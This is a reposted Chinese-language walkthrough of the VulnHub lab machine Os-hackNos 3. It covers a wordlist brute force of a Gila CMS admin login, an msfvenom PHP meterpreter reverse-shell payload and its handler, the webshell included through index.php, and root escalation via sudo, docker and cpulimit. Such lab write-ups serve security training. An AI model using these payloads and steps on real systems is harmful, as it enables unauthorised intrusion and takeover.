欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

vulhub:Os-hackNos 3

程序员文章站 2022-05-17 16:45:55
...

0x00基本信息

靶机下载地址:

Download: https://drive.google.com/open?id=1zWTU6BFXPmS8BDeoVc766FwUJQZ4-_RT
Download (Mirror): https://download.vulnhub.com/hacknos/Os-hackNos-3.ova
Download (Torrent): https://download.vulnhub.com/hacknos/Os-hackNos-3.ova.torrent ( Magnet)

靶机描述:

Back to the Top
Difficulty: Intermediate
Flag: 2 Flag first user And the second root
Learning: Web Application | Enumeration | Privilege Escalation
Web-site: www.hacknos.com
Contact-us : @rahul_gehlaut
This may work better with VirtualBox rather than VMware

0x01信息收集

kali:192.168;56.102
靶机:192.168.56.104
vulhub:Os-hackNos 3
端口扫描:
vulhub:Os-hackNos 3
目录扫描:
vulhub:Os-hackNos 3
访问80端口:
vulhub:Os-hackNos 3

访问刚刚目录扫描的script,没有有利用的地方:
vulhub:Os-hackNos 3
在去访问刚刚页面提到的websec,又出现一个页面,在对这个目录进行遍历,同时在这个页面还发现一个邮箱 aaa@qq.com :
vulhub:Os-hackNos 3

vulhub:Os-hackNos 3
看到有一个amdin目录,知道找到后台登录页面了,访问一下:
vulhub:Os-hackNos 3

0x02漏洞利用

使用账号:aaa@qq.com 密码:kali自带 进行**,没有**成功
使用cewl爬取http://192.168.56.104/websec页面,生成字典
vulhub:Os-hackNos 3
在使用刚刚生成的密码进行**,但是很快就被封掉了
vulhub:Os-hackNos 3
最后改一下bp,得到密码为Securityx
尝试登陆后台:
vulhub:Os-hackNos 3
查看后台功能,发现在content中管理web页面:
vulhub:Os-hackNos 3
使用msfvenom:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=1234 -f raw > webshell.php

在msf设置好监听:

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.36
set lport 1234
run

访问一直报错
vulhub:Os-hackNos 3
然后去掉webshell中的 /*,同时在文件中新建一个shell目录,再次上传webshell,在通过index.php来包含文件:

<?php
/*!
 * Gila CMS
 * Copyright 2017-19 Vasileios Zoumpourlis
 * Licensed under BSD 3-Clause License
 */

include 'src/core/bootstrap.php';
include 'shell/webshell.php';

?>

在访问主页面,就可以反弹shell:

vulhub:Os-hackNos 3
在使用python,获取一个交互的tty:
python -c ‘import pty; pty.spawn("/bin/bash")’
vulhub:Os-hackNos 3
然后查看文件,在/home/blackdevil找到flag
vulhub:Os-hackNos 3

0x03提权

1、使用脚本查找提权方式
2、手动查找具有root权限的可执行文件
3、查找具有账户密码

前面2个步骤没有发现东西,然后看了其他文章,在database
vulhub:Os-hackNos 3
解密地址:http://www.spammimic.com/spreadsheet.php?action=decode
vulhub:Os-hackNos 3
用户:blacKdevil 密码:aaa@qq.com@
vulhub:Os-hackNos 3

sudo su - 提权

vulhub:Os-hackNos 3

docker提权

1、下载文件导入:
下载地址:http://dl-cdn.alpinelinux.org/alpine/v3.11/releases/aarch64/
vulhub:Os-hackNos 3
2、构建的Dockfile(直接在kali里面写好在导入的):
vulhub:Os-hackNos 3
3、构建镜像:
vulhub:Os-hackNos 3
4、提取,执行文件,但是在执行文件的时候没有成功
vulhub:Os-hackNos 3

cpulimit提权

1、把文件编译好,放到靶机:
vulhub:Os-hackNos 3
wget下载可执行文件到靶机上并通过cpulimit执行
vulhub:Os-hackNos 3

0x04总结&问题&知识点

1、docker提权:
https://www.hackingarticles.in/docker-privilege-escalation/
https://www.freebuf.com/articles/system/170783.html
2、搭建镜像的方法:
https://www.cnblogs.com/cocowool/p/make_your_own_base_docker_image.html

参考文章:

https://blog.csdn.net/weixin_44214107/article/details/104039918

相关标签: 靶机